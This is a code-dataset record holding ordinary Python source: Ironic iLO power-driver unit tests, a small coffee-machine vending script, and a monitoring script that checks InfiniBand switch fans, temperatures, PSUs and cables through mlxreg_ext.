def test__attach_boot_iso_if_needed_on_rebuild(
self, setup_vmedia_mock, set_boot_device_mock,
get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.provision_state = states.DEPLOYING
task.node.instance_info['ilo_boot_iso'] = 'boot-iso'
ilo_power._attach_boot_iso_if_needed(task)
self.assertFalse(setup_vmedia_mock.called)
self.assertFalse(set_boot_device_mock.called)
class IloPowerTestCase(test_common.BaseIloTest):
def test_get_properties(self):
expected = ilo_common.COMMON_PROPERTIES
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertEqual(expected, task.driver.power.get_properties())
@mock.patch.object(ilo_common, 'parse_driver_info', spec_set=True,
autospec=True)
def test_validate(self, mock_drvinfo):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.power.validate(task)
mock_drvinfo.assert_called_once_with(task.node)
@mock.patch.object(ilo_common, 'parse_driver_info', spec_set=True,
autospec=True)
def test_validate_fail(self, mock_drvinfo):
side_effect = exception.InvalidParameterValue("Invalid Input")
mock_drvinfo.side_effect = side_effect
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.power.validate,
task)
@mock.patch.object(ilo_power, '_get_power_state', spec_set=True,
autospec=True)
def test_get_power_state(self, mock_get_power):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
mock_get_power.return_value = states.POWER_ON
self.assertEqual(states.POWER_ON,
task.driver.power.get_power_state(task))
mock_get_power.assert_called_once_with(task.node)
@mock.patch.object(ilo_power, '_set_power_state', spec_set=True,
autospec=True)
def _test_set_power_state(self, mock_set_power, timeout=None):
mock_set_power.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.power.set_power_state(task, states.POWER_ON,
timeout=timeout)
mock_set_power.assert_called_once_with(task, states.POWER_ON,
timeout=timeout)
def test_set_power_state_no_timeout(self):
self._test_set_power_state(timeout=None)
def test_set_power_state_timeout(self):
self._test_set_power_state(timeout=13)
@mock.patch.object(ilo_power, '_set_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power, '_get_power_state', spec_set=True,
autospec=True)
def _test_reboot(
self, mock_get_power, mock_set_power,
timeout=None):
mock_get_power.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.power.reboot(task, timeout=timeout)
mock_get_power.assert_called_once_with(task.node)
mock_set_power.assert_called_once_with(
task, states.REBOOT, timeout=timeout)
def test_reboot_no_timeout(self):
self._test_reboot(timeout=None)
def test_reboot_with_timeout(self):
self._test_reboot(timeout=100)
def test_get_supported_power_states(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
expected = [states.POWER_OFF, states.POWER_ON, states.REBOOT,
states.SOFT_POWER_OFF, states.SOFT_REBOOT]
self.assertEqual(
sorted(expected),
sorted(task.driver.power.
get_supported_power_states(task)))
|
# Copyright 2014 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for IloPower module."""
import mock
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import uuidutils
from ironic.common import boot_devices
from ironic.common import exception
from ironic.common import states
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules.ilo import common as ilo_common
from ironic.drivers.modules.ilo import power as ilo_power
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.drivers.modules.ilo import test_common
from ironic.tests.unit.objects import utils as obj_utils
ilo_error = importutils.try_import('proliantutils.exception')
INFO_DICT = db_utils.get_test_ilo_info()
CONF = cfg.CONF
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True, autospec=True)
class IloPowerInternalMethodsTestCase(test_common.BaseIloTest):
def setUp(self):
super(IloPowerInternalMethodsTestCase, self).setUp()
self.node = obj_utils.create_test_node(
self.context, driver='ilo', driver_info=INFO_DICT,
instance_uuid=uuidutils.generate_uuid())
CONF.set_override('power_wait', 1, 'ilo')
CONF.set_override('soft_power_off_timeout', 1, 'conductor')
def test__get_power_state(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
self.assertEqual(
states.POWER_ON, ilo_power._get_power_state(self.node))
ilo_mock_object.get_host_power_status.return_value = 'OFF'
self.assertEqual(
states.POWER_OFF, ilo_power._get_power_state(self.node))
ilo_mock_object.get_host_power_status.return_value = 'ERROR'
self.assertEqual(states.ERROR, ilo_power._get_power_state(self.node))
def test__get_power_state_fail(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
exc = ilo_error.IloError('error')
ilo_mock_object.get_host_power_status.side_effect = exc
self.assertRaises(exception.IloOperationError,
ilo_power._get_power_state,
self.node)
ilo_mock_object.get_host_power_status.assert_called_once_with()
def test__set_power_state_invalid_state(self, get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
ilo_power._set_power_state,
task,
states.ERROR)
def test__set_power_state_reboot_fail(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
exc = ilo_error.IloError('error')
ilo_mock_object.reset_server.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task,
states.REBOOT)
ilo_mock_object.reset_server.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_reboot_ok(self, get_post_mock,
get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = (['FinishedPost', 'PowerOff',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.REBOOT)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.reset_server.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_off_fail(self, get_post_mock,
get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = (['FinishedPost', 'FinishedPost',
'FinishedPost', 'FinishedPost',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task,
states.POWER_OFF)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.hold_pwr_btn.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_on_ok(self, get_post_mock, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = ['PowerOff', 'PowerOff', 'FinishedPost']
target_state = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, target_state)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_ok(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = (
['FinishedPost', 'FinishedPost', 'PowerOff', 'PowerOff', 'InPost',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
attach_boot_iso_mock.assert_called_once_with(task)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'soft rebooting', 'node_id': task.node.uuid,
'time_consumed': 2})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_ok_initial_power_off(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'OFF'
get_post_mock.side_effect = ['FinishedPost', 'PowerOff',
'FinishedPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
attach_boot_iso_mock.assert_called_once_with(task)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'power on', 'node_id': task.node.uuid,
'time_consumed': 1})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_fail_to_off(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
ilo_mock_object.press_pwr_btn.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=3)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
self.assertFalse(get_post_mock.called)
self.assertFalse(attach_boot_iso_mock.called)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_fail_to_on(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = (
['FinishedPost', 'PowerOff', 'PowerOff', 'InPost',
'InPost', 'InPost', 'InPost', 'InPost'])
ilo_mock_object.press_pwr_btn.side_effect = [None, exc]
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
ilo_mock_object.set_host_power.assert_called_once_with('ON')
attach_boot_iso_mock.assert_called_once_with(task)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_timeout(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = ['FinishedPost', 'FinishedPost',
'PowerOff', 'InPost', 'InPost', 'InPost'
'InPost', 'InPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=2)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
ilo_mock_object.set_host_power.assert_called_once_with('ON')
attach_boot_iso_mock.assert_called_once_with(task)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_ok(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = ['FinishedPost', 'FinishedPost', 'PowerOff'
'PowerOff', 'PowerOff']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_POWER_OFF, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'soft power off', 'node_id': task.node.uuid,
'time_consumed': 2})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_fail(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
ilo_mock_object.press_pwr_btn.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task, states.SOFT_POWER_OFF, timeout=2)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
self.assertFalse(get_post_mock.called)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_timeout(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = ['FinishedPost', 'InPost', 'InPost',
'InPost', 'InPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_POWER_OFF, timeout=2)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_with()
self.assertFalse(log_mock.called)
@mock.patch.object(manager_utils, 'node_set_boot_device', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'setup_vmedia_for_boot', spec_set=True,
autospec=True)
def test__attach_boot_iso_if_needed(
self, setup_vmedia_mock, set_boot_device_mock,
get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.provision_state = states.ACTIVE
task.node.instance_info['ilo_boot_iso'] = 'boot-iso'
ilo_power._attach_boot_iso_if_needed(task)
setup_vmedia_mock.assert_called_once_with(task, 'boot-iso')
set_boot_device_mock.assert_called_once_with(task,
boot_devices.CDROM)
@mock.patch.object(manager_utils, 'node_set_boot_device', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'setup_vmedia_for_boot', spec_set=True,
autospec=True)
def test__attach_boot_iso_if_needed_on_rebuild(
self, setup_vmedia_mock, set_boot_device_mock,
get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.provision_state = states.DEPLOYING
task.node.instance_info['ilo_boot_iso'] = 'boot-iso'
ilo_power._attach_boot_iso_if_needed(task)
self.assertFalse(setup_vmedia_mock.called)
self.assertFalse(set_boot_device_mock.called)
class IloPowerTestCase(test_common.BaseIloTest):
def test_get_properties(self):
expected = ilo_common.COMMON_PROPERTIES
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertEqual(expected, task.driver.power.get_properties())
@mock.patch.object(ilo_common, 'parse_driver_info', spec_set=True,
autospec=True)
def test_validate(self, mock_drvinfo):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.power.validate(task)
mock_drvinfo.assert_called_once_with(task.node)
@mock.patch.object(ilo_common, 'parse_driver_info', spec_set=True,
autospec=True)
def test_validate_fail(self, mock_drvinfo):
side_effect = exception.InvalidParameterValue("Invalid Input")
mock_drvinfo.side_effect = side_effect
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.power.validate,
task)
@mock.patch.object(ilo_power, '_get_power_state', spec_set=True,
autospec=True)
def test_get_power_state(self, mock_get_power):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
mock_get_power.return_value = states.POWER_ON
self.assertEqual(states.POWER_ON,
task.driver.power.get_power_state(task))
mock_get_power.assert_called_once_with(task.node)
@mock.patch.object(ilo_power, '_set_power_state', spec_set=True,
autospec=True)
def _test_set_power_state(self, mock_set_power, timeout=None):
mock_set_power.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.power.set_power_state(task, states.POWER_ON,
timeout=timeout)
mock_set_power.assert_called_once_with(task, states.POWER_ON,
timeout=timeout)
def test_set_power_state_no_timeout(self):
self._test_set_power_state(timeout=None)
def test_set_power_state_timeout(self):
self._test_set_power_state(timeout=13)
@mock.patch.object(ilo_power, '_set_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power, '_get_power_state', spec_set=True,
autospec=True)
def _test_reboot(
self, mock_get_power, mock_set_power,
timeout=None):
mock_get_power.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.power.reboot(task, timeout=timeout)
mock_get_power.assert_called_once_with(task.node)
mock_set_power.assert_called_once_with(
task, states.REBOOT, timeout=timeout)
def test_reboot_no_timeout(self):
self._test_reboot(timeout=None)
def test_reboot_with_timeout(self):
self._test_reboot(timeout=100)
def test_get_supported_power_states(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
expected = [states.POWER_OFF, states.POWER_ON, states.REBOOT,
states.SOFT_POWER_OFF, states.SOFT_REBOOT]
self.assertEqual(
sorted(expected),
sorted(task.driver.power.
get_supported_power_states(task)))
|
en
| 0.82379
|
# Copyright 2014 Hewlett-Packard Development Company, L.P. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. Test class for IloPower module.
| 1.728857
| 2
|
cofee machine/main.py
|
marcus1666/Python-Projects
| 2
|
6628485
|
from extras import MENU, resources
class machine():
def cash(self, product):
print("Please insert a coin")
quarters = int(input("How many quarters? "))
dimes = int(input("How many dimes: "))
nickles = int(input("How many nickles: "))
pennies = int(input("How many pennies: "))
user_amount = (quarters * 0.25) + (dimes * 0.1) + ( nickles * 0.05) + (pennies * 0.01)
value = MENU[product]
if user_amount < value["cost"]:
return False
else:
resources["money"] += value["cost"]
change = user_amount - value["cost"]
return change
def resources_maths(self, product):
if product == "espresso":
if resources["water"] >= 50:
if resources["coffee"] >= 18:
return True
else:
return False
else:
return False
#for latte
elif product == "latte":
if resources["water"] >= 200:
if resources["coffee"] >= 24:
if resources["milk"] >= 150:
return True
else:
return False
else:
return False
else:
return False
elif product == "cappuccino":
if resources["water"] >= 250:
if resources["coffee"] >= 24:
if resources["milk"] >= 100:
return True
else:
return False
else:
return False
else:
return False
def serve(self, product):
print(f"Here is your {product} ☕, Enjoy!!!")
value = MENU[product]
key = value["ingredients"]
if "water" in key:
resources["water"] -= key["water"]
if "milk" in key:
resources["milk"] -= key["milk"]
if "coffee" in key:
resources["coffee"] -= key["coffee"]
def prompt(self, user_input):
if user_input == "off":
return False
elif user_input == "resources":
water = resources["water"]
milk = resources["milk"]
coffee = resources["coffee"]
cash = resources["money"]
print(f"Water: {water}ml")
print(f"Milk: {milk}ml")
print(f"Coffee: {coffee}g")
print(f"Money: ${cash}")
else:
if self.resources_maths(user_input) == True:
cash = self.cash(user_input)
if cash == False:
print("Your money is not enough")
else:
print(f"Have your change of ${cash}")
self.serve(user_input)
else:
print(f"There are not enough ingredients to make your {user_input}")
def main():
on = True
while on:
user_input = input("What would you like? (espresso/latte/cappuccino): ").lower()
engine = machine()
if engine.prompt(user_input) == False:
on = False
if __name__ == '__main__':
main()
|
from extras import MENU, resources
class machine():
def cash(self, product):
print("Please insert a coin")
quarters = int(input("How many quarters? "))
dimes = int(input("How many dimes: "))
nickles = int(input("How many nickles: "))
pennies = int(input("How many pennies: "))
user_amount = (quarters * 0.25) + (dimes * 0.1) + ( nickles * 0.05) + (pennies * 0.01)
value = MENU[product]
if user_amount < value["cost"]:
return False
else:
resources["money"] += value["cost"]
change = user_amount - value["cost"]
return change
def resources_maths(self, product):
if product == "espresso":
if resources["water"] >= 50:
if resources["coffee"] >= 18:
return True
else:
return False
else:
return False
#for latte
elif product == "latte":
if resources["water"] >= 200:
if resources["coffee"] >= 24:
if resources["milk"] >= 150:
return True
else:
return False
else:
return False
else:
return False
elif product == "cappuccino":
if resources["water"] >= 250:
if resources["coffee"] >= 24:
if resources["milk"] >= 100:
return True
else:
return False
else:
return False
else:
return False
def serve(self, product):
print(f"Here is your {product} ☕, Enjoy!!!")
value = MENU[product]
key = value["ingredients"]
if "water" in key:
resources["water"] -= key["water"]
if "milk" in key:
resources["milk"] -= key["milk"]
if "coffee" in key:
resources["coffee"] -= key["coffee"]
def prompt(self, user_input):
if user_input == "off":
return False
elif user_input == "resources":
water = resources["water"]
milk = resources["milk"]
coffee = resources["coffee"]
cash = resources["money"]
print(f"Water: {water}ml")
print(f"Milk: {milk}ml")
print(f"Coffee: {coffee}g")
print(f"Money: ${cash}")
else:
if self.resources_maths(user_input) == True:
cash = self.cash(user_input)
if cash == False:
print("Your money is not enough")
else:
print(f"Have your change of ${cash}")
self.serve(user_input)
else:
print(f"There are not enough ingredients to make your {user_input}")
def main():
on = True
while on:
user_input = input("What would you like? (espresso/latte/cappuccino): ").lower()
engine = machine()
if engine.prompt(user_input) == False:
on = False
if __name__ == '__main__':
main()
|
zh
| 0.08132
|
#for latte
| 4.137218
| 4
|
check_ib_switch.py
|
guilbaults/check_ib_switch
| 1
|
6628486
|
<filename>check_ib_switch.py
import re
import sys
import argparse
import logging
import subprocess
import itertools
def parse_table_hex(lines):
info = {}
for line in lines:
m = re.match(r'(.*?)\s*\| (.*)', line)
info[str(m.group(1))] = int(m.group(2), 16)
return info
def parse_table_ascii(lines):
info = {}
for line in lines:
m = re.match(r'(.*?)(\[\d+\])?\s*\| (.*)', line)
field = str(m.group(1))
hex_v = bytearray.fromhex(m.group(3)[2:]).decode()
value = str(hex_v.replace(u'\x00', '').strip())
if m.group(2):
if field in info.keys():
info[field] = info[field] + value
else:
info[field] = value
else:
info[field] = value
return info
def mlxreg_ext_fans(lid, fan_id):
cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
'MFSM', '--get', '--indexes', 'tacho={}'.format(fan_id)]
stdout, stderr = subprocess.Popen(cmdargs,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
return parse_table_hex(stdout.decode("utf-8").splitlines()[4:-1])
def mlxreg_ext_temp(lid, sensor_id):
cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
'MTMP', '--get', '--indexes',
'sensor_index={}'.format(sensor_id)]
stdout, stderr = subprocess.Popen(cmdargs,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
return parse_table_hex(stdout.decode("utf-8").splitlines()[4:-1])
def mlxreg_ext_psu(lid):
cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
'MSPS', '--get']
stdout, stderr = subprocess.Popen(cmdargs,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
psus = {}
lines = stdout.decode("utf-8").splitlines()[4:-1]
for line in lines:
# PSU Watt with 0x8 prependded
m_watt = re.match(r'psu(\d)\[2\]\s+\| 0x8(.*)', line)
if m_watt:
psus['watt_' + m_watt.group(1)] = int(m_watt.group(2), 16)
return psus
def mlxreg_ext(lid, register):
cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
register, '--get']
stdout, stderr = subprocess.Popen(cmdargs,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
return parse_table_ascii(stdout.decode("utf-8").splitlines()[4:-1])
def ascii_field(name):
for field in ['vendor_name', 'vendor_sn', 'vendor_pn', 'vendor_rev']:
if field in name:
return True
return False
def mlxreg_ext_ports(lid, port_id):
index = 'local_port={},pnat=0x0,page_select=0x3,group_opcode=0x0'
cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
'PDDR', '--get', '--indexes', index.format(port_id)]
stdout, stderr = subprocess.Popen(cmdargs,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
lines = stdout.decode("utf-8").splitlines()[4:-1]
info = parse_table_ascii(filter(ascii_field, lines))
info.update(parse_table_hex(itertools.filterfalse(ascii_field, lines)))
return info
def guid_to_lid():
stdout, stderr = subprocess.Popen(['ibswitches'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
lids = {} # store GUID to LID mapping
for line in stdout.decode("utf-8").splitlines():
logging.debug('guid_to_lid: %s', line)
m = re.match(r'.*(0x.*) ports.* lid (\d+)', line)
lids[m.group(1)] = int(m.group(2))
return lids
def print_info(info):
for item in info:
print(item)
parser = argparse.ArgumentParser(description='')
parser.add_argument("-v", "--verbose", action="store_true",
help="increase output verbosity")
parser.add_argument("--guid", help="Switch GUID to check",
action="store")
parser.add_argument("--node_name_map", help="Node name map file path",
action="store")
parser.add_argument("--name", help="Switch name used in node-name-map",
action="store")
parser.add_argument("--fan", help="Check fans", action="store_true")
parser.add_argument("--cable", help="Check cables", action="store_true")
parser.add_argument("--psu", help="Check PSUs", action="store_true")
parser.add_argument("--temp", help="Check temperatures", action="store_true")
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
if args.name is False and args.guid is False:
print('Need to use the GUID or the switch name')
sys.exit(3)
if args.name:
if args.node_name_map is None:
print('node_name_map need to be defined')
sys.exit(3)
guid_name = {}
name_guid = {}
if args.node_name_map:
with open(args.node_name_map) as f:
for line in f:
m = re.match(r'(0x.*) "(.*)"', line)
if m:
guid_name[m.group(1)] = m.group(2)
name_guid[m.group(2)] = m.group(1)
guids = guid_to_lid()
if args.guid:
# received a GUID, check in node name map
guid = args.guid
if args.guid in guid_name:
name = guid_name[args.guid]
else:
name = args.guid
else:
# Received the name, need to get the GUID from the file
guid = name_guid[args.name]
name = args.name
lid = guids[guid]
perfdata = []
criticals = []
warnings = []
info = []
sw = mlxreg_ext(lid, 'MSGI')
info.append('GUID={} LID={} Name={}'.format(guid, lid, name))
info.append('{} PN={} Rev={} SN={}'.format(sw['product_name'],
sw['part_number'], sw['revision'], sw['serial_number']))
if args.psu:
psus = mlxreg_ext_psu(lid)
for i in range(2):
psu_watt = 'watt_{}'.format(i)
if psus[psu_watt] < 30:
criticals.append('PSU{} is down with {}W'.format(
i, psus[psu_watt]))
if psus[psu_watt] > 100:
warnings.append('PSU{} might be alone with {}W'.format(
i, psus[psu_watt]))
perfdata.append('PSU{psu}_W={watt};;30:100;;'.format(
psu=i,
watt=psus[psu_watt],
))
if args.fan:
for i in range(1, 9):
fan_info = mlxreg_ext_fans(lid, i)
rpm = fan_info['rpm']
if rpm < 4500:
criticals.append('Fan #{} is too slow, {} RPM'.format(i, rpm))
elif rpm > 13000:
criticals.append('Fan #{} is too fast, {} RPM'.format(i, rpm))
perfdata.append('Fan{fan}_RPM={speed};;{MIN_FAN}:{MAX_FAN};;'.format(
fan=i,
speed=rpm,
MIN_FAN=4500,
MAX_FAN=13000,
))
if args.temp:
for i in range(1, 7):
temp_info = mlxreg_ext_temp(lid, i)
temperature = temp_info['temperature']/10
if temperature > 45:
criticals.append('Temperature of #{} is too high, {}C'.format(
i, temperature))
perfdata.append('Temperature{sensor}_C={temp};;5:{MAX_TEMP};;'.format(
sensor=i,
temp=temperature,
MAX_TEMP=45,
))
if args.cable:
for i in range(1, 37):
cable = mlxreg_ext_ports(lid, i)
temperature = cable['temperature']/256
if temperature > 70:
criticals.append('Cable {} is overtemp at {}C > 70C'.format(
i, temperature))
info.append('Cable #{}, {} PN={} SN={} Rev={} FW={}, {}M'.format(
i,
cable['vendor_name'],
cable['vendor_pn'],
cable['vendor_sn'],
cable['vendor_rev'],
cable['fw_version'],
cable['cable_length'])
)
if len(criticals) > 1:
print('{criticals} | {perfdata}'.format(
criticals=', '.join(criticals) + ', '.join(warnings),
perfdata=' '.join(perfdata),
))
print_info(info)
sys.exit(2)
elif len(warnings) > 1:
print('{warnings} | {perfdata}'.format(
warnings=', '.join(warnings),
perfdata=' '.join(perfdata),
))
print_info(info)
sys.exit(1)
else:
print('Switch OK | {perfdata}'.format(
perfdata=' '.join(perfdata),
))
print_info(info)
sys.exit(0)
|
